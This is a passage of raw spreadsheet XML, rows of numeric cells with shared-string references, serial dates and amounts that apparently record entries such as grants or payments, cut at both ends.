        <v>9538</v>
      </c>
    </row>
    <row r="2543" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2543">
        <v>22294</v>
      </c>
      <c r="B2543">
        <v>2253</v>
      </c>
      <c r="C2543" t="s">
        <v>2612</v>
      </c>
      <c r="D2543" t="s">
        <v>9422</v>
      </c>
      <c r="E2543">
        <v>16</v>
      </c>
      <c r="F2543" t="s">
        <v>9904</v>
      </c>
      <c r="G2543" s="1">
        <v>44183</v>
      </c>
      <c r="H2543">
        <v>4000</v>
      </c>
      <c r="J2543" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2544" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2544">
        <v>22295</v>
      </c>
      <c r="B2544">
        <v>2253</v>
      </c>
      <c r="C2544" t="s">
        <v>2612</v>
      </c>
      <c r="D2544" t="s">
        <v>9422</v>
      </c>
      <c r="E2544">
        <v>16</v>
      </c>
      <c r="F2544" t="s">
        <v>11946</v>
      </c>
      <c r="G2544" s="1">
        <v>44183</v>
      </c>
      <c r="H2544">
        <v>1000</v>
      </c>
      <c r="J2544" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2545" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2545">
        <v>22296</v>
      </c>
      <c r="B2545">
        <v>916</v>
      </c>
      <c r="C2545" t="s">
        <v>3511</v>
      </c>
      <c r="D2545" t="s">
        <v>11947</v>
      </c>
      <c r="E2545">
        <v>22</v>
      </c>
      <c r="F2545" t="s">
        <v>673</v>
      </c>
      <c r="G2545" s="1">
        <v>44106</v>
      </c>
      <c r="H2545">
        <v>624</v>
      </c>
      <c r="J2545" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2546" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2546">
        <v>22297</v>
      </c>
      <c r="B2546">
        <v>489</v>
      </c>
      <c r="C2546" t="s">
        <v>1176</v>
      </c>
      <c r="D2546" t="s">
        <v>10884</v>
      </c>
      <c r="E2546">
        <v>13</v>
      </c>
      <c r="F2546" t="s">
        <v>9480</v>
      </c>
      <c r="G2546" s="1">
        <v>44165</v>
      </c>
      <c r="H2546">
        <v>17000</v>
      </c>
      <c r="J2546" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2547" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2547">
        <v>22298</v>
      </c>
      <c r="B2547">
        <v>916</v>
      </c>
      <c r="C2547" t="s">
        <v>3511</v>
      </c>
      <c r="D2547" t="s">
        <v>11947</v>
      </c>
      <c r="E2547">
        <v>22</v>
      </c>
      <c r="F2547" t="s">
        <v>9441</v>
      </c>
      <c r="G2547" s="1">
        <v>44106</v>
      </c>
      <c r="H2547">
        <v>20000</v>
      </c>
      <c r="J2547" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="2548" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2548">
        <v>22300</v>
      </c>
      <c r="B2548">
        <v>779</v>
      </c>
      <c r="C2548" t="s">
        <v>1194</v>
      </c>
      <c r="D2548" t="s">
        <v>11949</v>
      </c>
      <c r="E2548">
        <v>11</v>
      </c>
      <c r="F2548" t="s">
        <v>11903</v>
      </c>
      <c r="G2548" s="1">
        <v>44183</v>
      </c>
      <c r="H2548">
        <v>12000</v>
      </c>
      <c r="I2548" t="s">
        <v>11950</v>
      </c>
    </row>
    <row r="2549" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2549">
        <v>22301</v>
      </c>
      <c r="B2549">
        <v>779</v>
      </c>
      <c r="C2549" t="s">
        <v>1194</v>
      </c>
      <c r="D2549" t="s">
        <v>11949</v>
      </c>
      <c r="E2549">
        <v>11</v>
      </c>
      <c r="F2549" t="s">
        <v>11951</v>
      </c>
      <c r="G2549" s="1">
        <v>44183</v>
      </c>
      <c r="H2549">
        <v>100000</v>
      </c>
      <c r="I2549" t="s">
        <v>10735</v>
      </c>
    </row>
    <row r="2550" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2550">
        <v>22303</v>
      </c>
      <c r="B2550">
        <v>29</v>
      </c>
      <c r="C2550" t="s">
        <v>1899</v>
      </c>
      <c r="D2550" t="s">
        <v>11952</v>
      </c>
      <c r="E2550">
        <v>17</v>
      </c>
      <c r="F2550" t="s">
        <v>9217</v>
      </c>
      <c r="G2550" s="1">
        <v>44110</v>
      </c>
      <c r="H2550">
        <v>500</v>
      </c>
      <c r="J2550" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="2551" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2551">
        <v>22304</v>
      </c>
      <c r="B2551">
        <v>29</v>
      </c>
      <c r="C2551" t="s">
        <v>1899</v>
      </c>
      <c r="D2551" t="s">
        <v>11952</v>
      </c>
      <c r="E2551">
        <v>17</v>
      </c>
      <c r="F2551" t="s">
        <v>9466</v>
      </c>
      <c r="G2551" s="1">
        <v>44110</v>
      </c>
      <c r="H2551">
        <v>500</v>
      </c>
      <c r="J2551" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="2552" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2552">
        <v>22305</v>
      </c>
      <c r="B2552">
        <v>29</v>
      </c>
      <c r="C2552" t="s">
        <v>1899</v>
      </c>
      <c r="D2552" t="s">
        <v>11952</v>
      </c>
      <c r="E2552">
        <v>17</v>
      </c>
      <c r="F2552" t="s">
        <v>7613</v>
      </c>
      <c r="G2552" s="1">
        <v>44110</v>
      </c>
      <c r="H2552">
        <v>500</v>
      </c>
      <c r="J2552" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="2553" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2553">
        <v>22306</v>
      </c>
      <c r="B2553">
        <v>4796</v>
      </c>
      <c r="C2553" t="s">
        <v>7642</v>
      </c>
      <c r="D2553" t="s">
        <v>11953</v>
      </c>
      <c r="E2553">
        <v>2</v>
      </c>
      <c r="F2553" t="s">
        <v>7901</v>
      </c>
      <c r="G2553" s="1">
        <v>44097</v>
      </c>
      <c r="H2553">
        <v>10000</v>
      </c>
    </row>
    <row r="2554" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2554">
        <v>22307</v>
      </c>
      <c r="B2554">
        <v>4796</v>
      </c>
      <c r="C2554" t="s">
        <v>7642</v>
      </c>
      <c r="D2554" t="s">
        <v>11953</v>
      </c>
      <c r="E2554">
        <v>2</v>
      </c>
      <c r="F2554" t="s">
        <v>9892</v>
      </c>
      <c r="G2554" s="1">
        <v>44097</v>
      </c>
      <c r="H2554">
        <v>10000</v>
      </c>
    </row>
    <row r="2555" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2555">
        <v>22308</v>
      </c>
      <c r="B2555">
        <v>4796</v>
      </c>
      <c r="C2555" t="s">
        <v>7642</v>
      </c>
      <c r="D2555" t="s">
        <v>11953</v>
      </c>
      <c r="E2555">
        <v>2</v>
      </c>
      <c r="F2555" t="s">
        <v>9771</v>
      </c>
      <c r="G2555" s="1">
        <v>44097</v>
      </c>
      <c r="H2555">
        <v>10000</v>
      </c>
    </row>
    <row r="2556" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2556">
        <v>22309</v>
      </c>
      <c r="B2556">
        <v>4796</v>
      </c>
      <c r="C2556" t="s">
        <v>7642</v>
      </c>
      <c r="D2556" t="s">
        <v>11953</v>
      </c>
      <c r="E2556">
        <v>2</v>
      </c>
      <c r="F2556" t="s">
        <v>11954</v>
      </c>
      <c r="G2556" s="1">
        <v>44097</v>
      </c>
      <c r="H2556">
        <v>10000</v>
      </c>
    </row>
    <row r="2557" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2557">
        <v>22310</v>
      </c>
      <c r="B2557">
        <v>4796</v>
      </c>
      <c r="C2557" t="s">
        <v>7642</v>
      </c>
      <c r="D2557" t="s">
        <v>11953</v>
      </c>
      <c r="E2557">
        <v>2</v>
      </c>
      <c r="F2557" t="s">
        <v>11955</v>
      </c>
      <c r="G2557" s="1">
        <v>44097</v>
      </c>
      <c r="H2557">
        <v>10000</v>
      </c>
    </row>
    <row r="2558" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2558">
        <v>22311</v>
      </c>
      <c r="B2558">
        <v>4796</v>
      </c>
      <c r="C2558" t="s">
        <v>7642</v>
      </c>
      <c r="D2558" t="s">
        <v>11953</v>
      </c>
      <c r="E2558">
        <v>2</v>
      </c>
      <c r="F2558" t="s">
        <v>9437</v>
      </c>
      <c r="G2558" s="1">
        <v>44097</v>
      </c>
      <c r="H2558">
        <v>10000</v>
      </c>
      <c r="J2558" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2559" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2559">
        <v>22312</v>
      </c>
      <c r="B2559">
        <v>4796</v>
      </c>
      <c r="C2559" t="s">
        <v>7642</v>
      </c>
      <c r="D2559" t="s">
        <v>11953</v>
      </c>
      <c r="E2559">
        <v>2</v>
      </c>
      <c r="F2559" t="s">
        <v>9527</v>
      </c>
      <c r="G2559" s="1">
        <v>44097</v>
      </c>
      <c r="H2559">
        <v>10000</v>
      </c>
    </row>
    <row r="2560" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2560">
        <v>22313</v>
      </c>
      <c r="B2560">
        <v>4796</v>
      </c>
      <c r="C2560" t="s">
        <v>7642</v>
      </c>
      <c r="D2560" t="s">
        <v>11953</v>
      </c>
      <c r="E2560">
        <v>2</v>
      </c>
      <c r="F2560" t="s">
        <v>11956</v>
      </c>
      <c r="G2560" s="1">
        <v>44097</v>
      </c>
      <c r="H2560">
        <v>10000</v>
      </c>
    </row>
    <row r="2561" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2561">
        <v>22314</v>
      </c>
      <c r="B2561">
        <v>4796</v>
      </c>
      <c r="C2561" t="s">
        <v>7642</v>
      </c>
      <c r="D2561" t="s">
        <v>11953</v>
      </c>
      <c r="E2561">
        <v>2</v>
      </c>
      <c r="F2561" t="s">
        <v>11957</v>
      </c>
      <c r="G2561" s="1">
        <v>44097</v>
      </c>
      <c r="H2561">
        <v>10000</v>
      </c>
    </row>
    <row r="2562" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2562">
        <v>22315</v>
      </c>
      <c r="B2562">
        <v>4796</v>
      </c>
      <c r="C2562" t="s">
        <v>7642</v>
      </c>
      <c r="D2562" t="s">
        <v>11953</v>
      </c>
      <c r="E2562">
        <v>2</v>
      </c>
      <c r="F2562" t="s">
        <v>4508</v>
      </c>
      <c r="G2562" s="1">
        <v>44097</v>
      </c>
      <c r="H2562">
        <v>10000</v>
      </c>
    </row>
    <row r="2563" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2563">
        <v>22320</v>
      </c>
      <c r="B2563">
        <v>16</v>
      </c>
      <c r="C2563" t="s">
        <v>1906</v>
      </c>
      <c r="D2563" t="s">
        <v>11958</v>
      </c>
      <c r="E2563">
        <v>22</v>
      </c>
      <c r="F2563" t="s">
        <v>1746</v>
      </c>
      <c r="G2563" s="1">
        <v>44104</v>
      </c>
      <c r="H2563">
        <v>47000</v>
      </c>
      <c r="J2563" t="s">
        <v>11959</v>
      </c>
    </row>
    <row r="2564" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2564">
        <v>22321</v>
      </c>
      <c r="B2564">
        <v>4832</v>
      </c>
      <c r="C2564" t="s">
        <v>16405</v>
      </c>
      <c r="D2564" t="s">
        <v>16436</v>
      </c>
      <c r="E2564">
        <v>26</v>
      </c>
      <c r="F2564" t="s">
        <v>673</v>
      </c>
      <c r="G2564" s="1">
        <v>44127</v>
      </c>
      <c r="H2564" s="4">
        <v>14580</v>
      </c>
      <c r="J2564" t="s">
        <v>11961</v>
      </c>
    </row>
    <row r="2565" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2565">
        <v>22322</v>
      </c>
      <c r="B2565">
        <v>4832</v>
      </c>
      <c r="C2565" t="s">
        <v>16405</v>
      </c>
      <c r="D2565" t="s">
        <v>16436</v>
      </c>
      <c r="E2565">
        <v>26</v>
      </c>
      <c r="F2565" t="s">
        <v>9441</v>
      </c>
      <c r="G2565" s="1">
        <v>44127</v>
      </c>
      <c r="H2565" s="4">
        <v>1500000</v>
      </c>
      <c r="J2565" t="s">
        <v>11962</v>
      </c>
    </row>
    <row r="2566" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2566">
        <v>22323</v>
      </c>
      <c r="B2566">
        <v>4796</v>
      </c>
      <c r="C2566" t="s">
        <v>7642</v>
      </c>
      <c r="D2566" t="s">
        <v>11953</v>
      </c>
      <c r="E2566">
        <v>2</v>
      </c>
      <c r="F2566" t="s">
        <v>1746</v>
      </c>
      <c r="G2566" s="1">
        <v>44097</v>
      </c>
      <c r="H2566">
        <v>10000</v>
      </c>
    </row>
    <row r="2567" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2567">
        <v>22325</v>
      </c>
      <c r="B2567">
        <v>4796</v>
      </c>
      <c r="C2567" t="s">
        <v>7642</v>
      </c>
      <c r="D2567" t="s">
        <v>11953</v>
      </c>
      <c r="E2567">
        <v>2</v>
      </c>
      <c r="F2567" t="s">
        <v>3814</v>
      </c>
      <c r="G2567" s="1">
        <v>44097</v>
      </c>
      <c r="H2567">
        <v>10000</v>
      </c>
    </row>
    <row r="2568" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2568">
        <v>22326</v>
      </c>
      <c r="B2568">
        <v>4796</v>
      </c>
      <c r="C2568" t="s">
        <v>7642</v>
      </c>
      <c r="D2568" t="s">
        <v>11953</v>
      </c>
      <c r="E2568">
        <v>2</v>
      </c>
      <c r="F2568" t="s">
        <v>11963</v>
      </c>
      <c r="G2568" s="1">
        <v>44097</v>
      </c>
      <c r="H2568">
        <v>10000</v>
      </c>
      <c r="J2568" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2569" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2569">
        <v>22327</v>
      </c>
      <c r="B2569">
        <v>4796</v>
      </c>
      <c r="C2569" t="s">
        <v>7642</v>
      </c>
      <c r="D2569" t="s">
        <v>11953</v>
      </c>
      <c r="E2569">
        <v>2</v>
      </c>
      <c r="F2569" t="s">
        <v>11964</v>
      </c>
      <c r="G2569" s="1">
        <v>44097</v>
      </c>
      <c r="H2569">
        <v>10000</v>
      </c>
    </row>
    <row r="2570" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2570">
        <v>22329</v>
      </c>
      <c r="B2570">
        <v>4796</v>
      </c>
      <c r="C2570" t="s">
        <v>7642</v>
      </c>
      <c r="D2570" t="s">
        <v>11953</v>
      </c>
      <c r="E2570">
        <v>2</v>
      </c>
      <c r="F2570" t="s">
        <v>7057</v>
      </c>
      <c r="G2570" s="1">
        <v>44097</v>
      </c>
      <c r="H2570">
        <v>10000</v>
      </c>
      <c r="J2570" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2571" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2571">
        <v>22330</v>
      </c>
      <c r="B2571">
        <v>469</v>
      </c>
      <c r="C2571" t="s">
        <v>1626</v>
      </c>
      <c r="D2571" t="s">
        <v>11336</v>
      </c>
      <c r="E2571">
        <v>12</v>
      </c>
      <c r="F2571" t="s">
        <v>7296</v>
      </c>
      <c r="G2571" s="1">
        <v>44075</v>
      </c>
      <c r="H2571">
        <v>10000</v>
      </c>
      <c r="I2571" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2572" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2572">
        <v>22332</v>
      </c>
      <c r="B2572">
        <v>1430</v>
      </c>
      <c r="C2572" t="s">
        <v>2867</v>
      </c>
      <c r="D2572" t="s">
        <v>11965</v>
      </c>
      <c r="E2572">
        <v>13</v>
      </c>
      <c r="F2572" t="s">
        <v>9561</v>
      </c>
      <c r="G2572" s="1">
        <v>44103</v>
      </c>
      <c r="H2572">
        <v>0</v>
      </c>
      <c r="I2572" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="2573" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2573">
        <v>22333</v>
      </c>
      <c r="B2573">
        <v>1430</v>
      </c>
      <c r="C2573" t="s">
        <v>2867</v>
      </c>
      <c r="D2573" t="s">
        <v>11965</v>
      </c>
      <c r="E2573">
        <v>13</v>
      </c>
      <c r="F2573" t="s">
        <v>10208</v>
      </c>
      <c r="G2573" s="1">
        <v>44103</v>
      </c>
      <c r="H2573">
        <v>0</v>
      </c>
      <c r="I2573" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="2574" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2574">
        <v>22334</v>
      </c>
      <c r="B2574">
        <v>1430</v>
      </c>
      <c r="C2574" t="s">
        <v>2867</v>
      </c>
      <c r="D2574" t="s">
        <v>11965</v>
      </c>
      <c r="E2574">
        <v>13</v>
      </c>
      <c r="F2574" t="s">
        <v>11967</v>
      </c>
      <c r="G2574" s="1">
        <v>44103</v>
      </c>
      <c r="H2574">
        <v>0</v>
      </c>
      <c r="I2574" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="2575" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2575">
        <v>22335</v>
      </c>
      <c r="B2575">
        <v>4962</v>
      </c>
      <c r="C2575" t="s">
        <v>2612</v>
      </c>
      <c r="D2575" t="s">
        <v>11968</v>
      </c>
      <c r="E2575">
        <v>26</v>
      </c>
      <c r="F2575" t="s">
        <v>9443</v>
      </c>
      <c r="G2575" s="1">
        <v>44274</v>
      </c>
      <c r="H2575">
        <v>250000</v>
      </c>
      <c r="J2575" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2576" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2576">
        <v>22336</v>
      </c>
      <c r="B2576">
        <v>4962</v>
      </c>
      <c r="C2576" t="s">
        <v>2612</v>
      </c>
      <c r="D2576" t="s">
        <v>11968</v>
      </c>
      <c r="E2576">
        <v>26</v>
      </c>
      <c r="F2576" t="s">
        <v>2236</v>
      </c>
      <c r="G2576" s="1">
        <v>44274</v>
      </c>
      <c r="H2576">
        <v>242460</v>
      </c>
      <c r="J2576" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2577" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2577">
        <v>22337</v>
      </c>
      <c r="B2577">
        <v>4962</v>
      </c>
      <c r="C2577" t="s">
        <v>2612</v>
      </c>
      <c r="D2577" t="s">
        <v>11968</v>
      </c>
      <c r="E2577">
        <v>26</v>
      </c>
      <c r="F2577" t="s">
        <v>9444</v>
      </c>
      <c r="G2577" s="1">
        <v>44274</v>
      </c>
      <c r="H2577">
        <v>100000</v>
      </c>
      <c r="J2577" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2578" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2578">
        <v>22338</v>
      </c>
      <c r="B2578">
        <v>958</v>
      </c>
      <c r="C2578" t="s">
        <v>2572</v>
      </c>
      <c r="D2578" t="s">
        <v>9575</v>
      </c>
      <c r="E2578">
        <v>16</v>
      </c>
      <c r="F2578" t="s">
        <v>7241</v>
      </c>
      <c r="G2578" s="1">
        <v>44182</v>
      </c>
      <c r="H2578">
        <v>191000</v>
      </c>
      <c r="J2578" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2579" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2579">
        <v>22339</v>
      </c>
      <c r="B2579">
        <v>321</v>
      </c>
      <c r="C2579" t="s">
        <v>1913</v>
      </c>
      <c r="D2579" t="s">
        <v>11969</v>
      </c>
      <c r="E2579">
        <v>13</v>
      </c>
      <c r="F2579" t="s">
        <v>1915</v>
      </c>
      <c r="G2579" s="1">
        <v>44119</v>
      </c>
      <c r="H2579">
        <v>561295</v>
      </c>
      <c r="I2579" t="s">
        <v>11970</v>
      </c>
      <c r="J2579" t="s">
        <v>11971</v>
      </c>
    </row>
    <row r="2580" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2580">
        <v>22340</v>
      </c>
      <c r="B2580">
        <v>4898</v>
      </c>
      <c r="C2580" t="s">
        <v>16437</v>
      </c>
      <c r="D2580" t="s">
        <v>16438</v>
      </c>
      <c r="E2580">
        <v>1</v>
      </c>
      <c r="F2580" t="s">
        <v>11972</v>
      </c>
      <c r="G2580" s="1">
        <v>44104</v>
      </c>
      <c r="H2580" s="4">
        <v>200000</v>
      </c>
      <c r="I2580" t="s">
        <v>11973</v>
      </c>
      <c r="J2580" t="s">
        <v>11974</v>
      </c>
    </row>
    <row r="2581" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2581">
        <v>22341</v>
      </c>
      <c r="B2581">
        <v>4898</v>
      </c>
      <c r="C2581" t="s">
        <v>16437</v>
      </c>
      <c r="D2581" t="s">
        <v>16438</v>
      </c>
      <c r="E2581">
        <v>1</v>
      </c>
      <c r="F2581" t="s">
        <v>11975</v>
      </c>
      <c r="G2581" s="1">
        <v>44104</v>
      </c>
      <c r="H2581" s="4">
        <v>200000</v>
      </c>
      <c r="I2581" t="s">
        <v>11976</v>
      </c>
      <c r="J2581" t="s">
        <v>11974</v>
      </c>
    </row>
    <row r="2582" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2582">
        <v>22344</v>
      </c>
      <c r="B2582">
        <v>4962</v>
      </c>
      <c r="C2582" t="s">
        <v>2612</v>
      </c>
      <c r="D2582" t="s">
        <v>11968</v>
      </c>
      <c r="E2582">
        <v>26</v>
      </c>
      <c r="F2582" t="s">
        <v>9732</v>
      </c>
      <c r="G2582" s="1">
        <v>44274</v>
      </c>
      <c r="H2582">
        <v>10000</v>
      </c>
      <c r="J2582" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2583" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2583">
        <v>22345</v>
      </c>
      <c r="B2583">
        <v>4962</v>
      </c>
      <c r="C2583" t="s">
        <v>2612</v>
      </c>
      <c r="D2583" t="s">
        <v>11968</v>
      </c>
      <c r="E2583">
        <v>26</v>
      </c>
      <c r="F2583" t="s">
        <v>10125</v>
      </c>
      <c r="G2583" s="1">
        <v>44274</v>
      </c>
      <c r="H2583">
        <v>10000</v>
      </c>
      <c r="J2583" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2584" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2584">
        <v>22346</v>
      </c>
      <c r="B2584">
        <v>4962</v>
      </c>
      <c r="C2584" t="s">
        <v>2612</v>
      </c>
      <c r="D2584" t="s">
        <v>11968</v>
      </c>
      <c r="E2584">
        <v>26</v>
      </c>
      <c r="F2584" t="s">
        <v>11977</v>
      </c>
      <c r="G2584" s="1">
        <v>44274</v>
      </c>
      <c r="H2584">
        <v>10000</v>
      </c>
      <c r="J2584" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2585" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2585">
        <v>22347</v>
      </c>
      <c r="B2585">
        <v>4962</v>
      </c>
      <c r="C2585" t="s">
        <v>2612</v>
      </c>
      <c r="D2585" t="s">
        <v>11968</v>
      </c>
      <c r="E2585">
        <v>26</v>
      </c>
      <c r="F2585" t="s">
        <v>11978</v>
      </c>
      <c r="G2585" s="1">
        <v>44274</v>
      </c>
      <c r="H2585">
        <v>100000</v>
      </c>
      <c r="J2585" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2586" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2586">
        <v>22348</v>
      </c>
      <c r="B2586">
        <v>4962</v>
      </c>
      <c r="C2586" t="s">
        <v>2612</v>
      </c>
      <c r="D2586" t="s">
        <v>11968</v>
      </c>
      <c r="E2586">
        <v>26</v>
      </c>
      <c r="F2586" t="s">
        <v>9672</v>
      </c>
      <c r="G2586" s="1">
        <v>44274</v>
      </c>
      <c r="H2586">
        <v>100000</v>
      </c>
      <c r="J2586" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2587" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2587">
        <v>22349</v>
      </c>
      <c r="B2587">
        <v>1274</v>
      </c>
      <c r="C2587" t="s">
        <v>3528</v>
      </c>
      <c r="D2587" t="s">
        <v>11979</v>
      </c>
      <c r="E2587">
        <v>11</v>
      </c>
      <c r="F2587" t="s">
        <v>9438</v>
      </c>
      <c r="G2587" s="1">
        <v>44167</v>
      </c>
      <c r="H2587">
        <v>200000</v>
      </c>
      <c r="I2587" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="2588" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2588">
        <v>22350</v>
      </c>
      <c r="B2588">
        <v>1274</v>
      </c>
      <c r="C2588" t="s">
        <v>3528</v>
      </c>
      <c r="D2588" t="s">
        <v>11979</v>
      </c>
      <c r="E2588">
        <v>11</v>
      </c>
      <c r="F2588" t="s">
        <v>2924</v>
      </c>
      <c r="G2588" s="1">
        <v>44167</v>
      </c>
      <c r="H2588">
        <v>200000</v>
      </c>
      <c r="I2588" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="2589" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2589">
        <v>22351</v>
      </c>
      <c r="B2589">
        <v>1274</v>
      </c>
      <c r="C2589" t="s">
        <v>3528</v>
      </c>
      <c r="D2589" t="s">
        <v>11979</v>
      </c>
      <c r="E2589">
        <v>11</v>
      </c>
      <c r="F2589" t="s">
        <v>9435</v>
      </c>
      <c r="G2589" s="1">
        <v>44160</v>
      </c>
      <c r="H2589">
        <v>50000</v>
      </c>
      <c r="I2589" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="2590" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2590">
        <v>22352</v>
      </c>
      <c r="B2590">
        <v>1274</v>
      </c>
      <c r="C2590" t="s">
        <v>3528</v>
      </c>
      <c r="D2590" t="s">
        <v>11979</v>
      </c>
      <c r="E2590">
        <v>11</v>
      </c>
      <c r="F2590" t="s">
        <v>9577</v>
      </c>
      <c r="G2590" s="1">
        <v>44160</v>
      </c>
      <c r="H2590">
        <v>50000</v>
      </c>
      <c r="I2590" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="2591" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2591">
        <v>22353</v>
      </c>
      <c r="B2591">
        <v>1274</v>
      </c>
      <c r="C2591" t="s">
        <v>3528</v>
      </c>
      <c r="D2591" t="s">
        <v>11979</v>
      </c>
      <c r="E2591">
        <v>11</v>
      </c>
      <c r="F2591" t="s">
        <v>9561</v>
      </c>
      <c r="G2591" s="1">
        <v>44160</v>
      </c>
      <c r="H2591">
        <v>100000</v>
      </c>
      <c r="I2591" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="2592" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2592">
        <v>22354</v>
      </c>
      <c r="B2592">
        <v>1274</v>
      </c>
      <c r="C2592" t="s">
        <v>3528</v>
      </c>
      <c r="D2592" t="s">
        <v>11979</v>
      </c>
      <c r="E2592">
        <v>11</v>
      </c>
      <c r="F2592" t="s">
        <v>9676</v>
      </c>
      <c r="G2592" s="1">
        <v>44160</v>
      </c>
      <c r="H2592">
        <v>100000</v>
      </c>
      <c r="I2592" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="2593" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2593">
        <v>22355</v>
      </c>
      <c r="B2593">
        <v>1274</v>
      </c>
      <c r="C2593" t="s">
        <v>3528</v>
      </c>
      <c r="D2593" t="s">
        <v>11979</v>
      </c>
      <c r="E2593">
        <v>11</v>
      </c>
      <c r="F2593" t="s">
        <v>9595</v>
      </c>
      <c r="G2593" s="1">
        <v>44167</v>
      </c>
      <c r="H2593">
        <v>50000</v>
      </c>
      <c r="I2593" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="2594" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2594">
        <v>22356</v>
      </c>
      <c r="B2594">
        <v>1274</v>
      </c>
      <c r="C2594" t="s">
        <v>3528</v>
      </c>
      <c r="D2594" t="s">
        <v>11979</v>
      </c>
      <c r="E2594">
        <v>11</v>
      </c>
      <c r="F2594" t="s">
        <v>9928</v>
      </c>
      <c r="G2594" s="1">
        <v>44167</v>
      </c>
      <c r="H2594">
        <v>50000</v>
      </c>
      <c r="I2594" t="s">
        <v>11980</v>
      </c>
    </row>
    <row r="2595" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2595">
        <v>22357</v>
      </c>
      <c r="B2595">
        <v>1048</v>
      </c>
      <c r="C2595" t="s">
        <v>3554</v>
      </c>
      <c r="D2595" t="s">
        <v>11981</v>
      </c>
      <c r="E2595">
        <v>14</v>
      </c>
      <c r="F2595" t="s">
        <v>1746</v>
      </c>
      <c r="G2595" s="1">
        <v>44097</v>
      </c>
      <c r="H2595">
        <v>800000</v>
      </c>
      <c r="J2595" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2596" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2596">
        <v>22358</v>
      </c>
      <c r="B2596">
        <v>1048</v>
      </c>
      <c r="C2596" t="s">
        <v>3554</v>
      </c>
      <c r="D2596" t="s">
        <v>11981</v>
      </c>
      <c r="E2596">
        <v>14</v>
      </c>
      <c r="F2596" t="s">
        <v>11982</v>
      </c>
      <c r="G2596" s="1">
        <v>44097</v>
      </c>
      <c r="H2596">
        <v>2000</v>
      </c>
      <c r="J2596" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2597" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2597">
        <v>22359</v>
      </c>
      <c r="B2597">
        <v>1048</v>
      </c>
      <c r="C2597" t="s">
        <v>3554</v>
      </c>
      <c r="D2597" t="s">
